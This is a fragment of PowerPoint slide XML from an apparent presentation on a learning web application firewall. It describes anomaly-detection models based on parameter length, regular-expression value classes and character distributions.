            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Values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dirty="0" smtClean="0"/>
                  <a:t>If</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL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pl-PL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  <m:r>
                        <a:rPr lang="pl-PL" i="1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pl-PL" i="1" baseline="-25000">
                              <a:latin typeface="Cambria Math"/>
                              <a:ea typeface="Cambria Math"/>
                            </a:rPr>
                            <m:t>𝑜𝑏𝑠</m:t>
                          </m:r>
                        </m:e>
                      </m:d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  <a:ea typeface="Cambria Math"/>
                            </a:rPr>
                            <m:t>𝑣𝑎𝑟</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="pl-PL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pl-PL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pl-PL" i="1">
                              <a:latin typeface="Cambria Math"/>
                              <a:ea typeface="Cambria Math"/>
                            </a:rPr>
                            <m:t>) </m:t>
                          </m:r>
                        </m:num>
                        <m:den>
                          <m:sSup>
                            <m:sSupPr>
                              <m:ctrlPr>
                                <a:rPr lang="pl-PL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l-PL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l-PL" i="1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  <m:r>
                                    <a:rPr lang="pl-PL" i="1" baseline="-25000">
                                      <a:latin typeface="Cambria Math"/>
                                      <a:ea typeface="Cambria Math"/>
                                    </a:rPr>
                                    <m:t>𝑜𝑏𝑠</m:t>
                                  </m:r>
                                  <m:r>
                                    <a:rPr lang="pl-PL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pl-PL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  <m:r>
                                    <a:rPr lang="pl-PL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pl-PL" i="1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  <m:r>
                                    <a:rPr lang="pl-PL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l-PL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1 </m:t>
                      </m:r>
                    </m:oMath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pl-PL" i="1" smtClean="0">
                              <a:latin typeface="Cambria Math"/>
                              <a:ea typeface="Cambria Math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r>
                  <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/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  <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑙</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1" baseline="-25000">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑜𝑏</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" baseline="-25000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pl-PL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</m:d>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea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pl-PL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𝑣𝑎𝑟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l-PL" i="1"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rad>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>≝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𝑙</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" baseline="-25000" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑚𝑎𝑥</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0">
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t> and </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/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pl-PL" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑙</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1" baseline="-25000">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑜𝑏𝑠</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL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</m:d>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea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pl-PL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𝑣𝑎𝑟</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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l-PL" i="1"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pl-PL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pl-PL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  <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>≝</m:t>
                    </m:r>
                    <m:sSub>
                      <m:sSubPr>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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b>
                        <m:r>
                          <a:rPr lang="pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                            <a:ea typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑚𝑖𝑛</m:t>
                        </m:r>
                      </m:sub>
                    </m:sSub>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="pl-PL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pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Attacks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cannot</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> be </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>detected</a:t>
                </a:r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00200"/>
                <a:ext cx="8229600" cy="4525963"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-1926" t="-17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1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Belonging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Predefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>lasses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6371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err="1" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>with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without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>. 123, +56, -78)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>^[+-]?(0)|([1-9]\d*)$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>separated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b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 123, 12.3, .3)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^([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>0-9]+\.[0-9]*)|([0-9]*\.[0-9]+)|([0-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>]+)$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>comma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1"/>
              <a:t>separated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0"/>
              <a:t> real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1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^([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>0-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>]+,[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>0-9]*)|([0-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>]*,[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>0-9]+)|([0-9]+)$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty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somebody@example.org)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^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>The US </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1"/>
              <a:t>currency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty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/>
              <a:t>$0.59, $1050, $2,596.99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>^\$(\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>d{1,3}(\,\d{3})*|(\d+))(\.\d{2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>})?$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0"/>
              <a:t>Http(s) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a: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 http://example.org, https://example.org/test/abc)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^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>?\://[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>a-zA-Z0-9\-\.]+\.[a-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>zA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>-Z]{2,3}(/\S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>*)*$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>word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^[a-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>zA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>-Z]+$</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>text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^[a-zA-Z0-9.!?,;”’- \t\n]+$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean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75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Outline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Introduction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> extra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> for Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Learning Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Appliaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Firewall </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Learning WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>architecture</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>models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endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Results</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Summary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37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Belonging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Predefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Classess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363272" cy="4637112"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:normAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>Learning</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>If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all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values</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> from a learning set </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>belong</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> to k-th </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>regular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expression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class</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>,  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>this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class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is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added</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> to set C (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter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constrains</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> set)</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:b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𝐶</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>=</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL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pl-P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l-PL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l-PL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l-PL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pl-PL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l-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>}</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Testing</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>The </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>observed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value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is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tested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if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it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belongs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> to </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>classes</a:t>
                </a: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l-PL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l-PL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l-PL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pl-PL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l-PL" dirty="0" smtClean="0"/>
                  <a:t> - the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>classes</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (from set C) to </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>which</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>observed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value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belongs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is</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> i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pl-PL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pl-PL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pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="457200" lvl="1" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="457200" lvl="1" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/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363272" cy="4637112"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-1458" t="-2632" r="-123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ostokąt 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611561" y="5334000"/>
            <a:ext cx="1872208" cy="687288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="6F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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>haracter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Distribution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l-PL" dirty="0" smtClean="0"/>
                  <a:t>For </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>every</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>character</a:t>
                </a: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𝑐h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l-PL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l-PL" dirty="0" smtClean="0"/>
                  <a:t>in </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter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values</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (from a learning set) we </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>calculate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an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expected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value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>relative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frequency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/>
                          </a:rPr>
                          <m:t>𝐸</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>(</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑓𝑟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</a:rPr>
                          <m:t>𝑐h</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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l-PL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l-PL" dirty="0" smtClean="0"/>
                  <a:t> and </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>variance</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>relative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frequences</a:t>
                </a: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/>
                          </a:rPr>
                          <m:t>𝑣𝑎𝑟</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>(</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑓𝑟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𝑐h𝑘</m:t>
                        </m:r>
                      </m:sub>
                    </m:sSub>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>)</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="pl-PL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𝑓</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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</a:rPr>
                          <m:t>𝑖</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>,</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑐h𝑘</m:t>
                        </m:r>
                      </m:sub>
                    </m:sSub>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (relative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𝑐h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l-PL" dirty="0" smtClean="0"/>
